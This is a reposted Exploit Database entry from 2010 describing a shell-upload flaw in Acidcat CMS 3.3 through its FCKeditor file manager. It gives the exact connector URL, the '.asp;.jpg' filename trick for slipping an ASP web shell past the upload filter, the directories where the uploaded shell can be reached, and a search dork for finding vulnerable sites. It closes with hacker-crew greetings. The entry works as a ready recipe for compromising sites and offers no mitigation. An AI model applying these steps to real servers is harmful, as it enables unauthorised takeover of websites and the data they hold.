Acidcat CMS 3.3 – ‘FCKeditor’ Arbitrary File Upload

• Exploit Database
• 14 阅读

• 作者： Net.Edit0r
  日期： 2010-11-22
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/15597/

• ============================================================================== 
   
  [»] Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability
   
  ============================================================================== 
   
  [»] Title : [ Acidcat CMS v 3.x (fckeditor) Shell Upload Vulnerability ]
   
  [»] Script: [ Mini-NUKE v2.3] 
   
  [»] Language: [ ASP ] 
   
  [»] Download: [ http://www.acidcat.com/default.asp?itemID=202&itemTitle=Download Free]
   
  [»] Author: [ Net.Edit0r - black.hat.tm@gmail.com }
   
  [»] My Home : [ ajaxtm.com and datacoders.org ] 
   
  [»] Date: [ 2010-11-23 ] 
  
  [»] Version : [ 3.3.X and 3.2.x ]
  
  [»] Dork: [ "Powered by Acidcat CMS " ]
  
   
   
  ########################################################################### 
   
  
  ===[ Exploit ]=== 
   
   
  [»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp 
   
  [»] asp renamed via the .asp;.jpg (shell.asp;.jpg)
  
  ===[ Upload To ]===
  
  [»] http://server/read_write/file/[Shell] 
  
  [»] http://server/public/File/[Shell]
  
  
  Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1
  
   BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic~ keracker
  
   
  ###########################################################################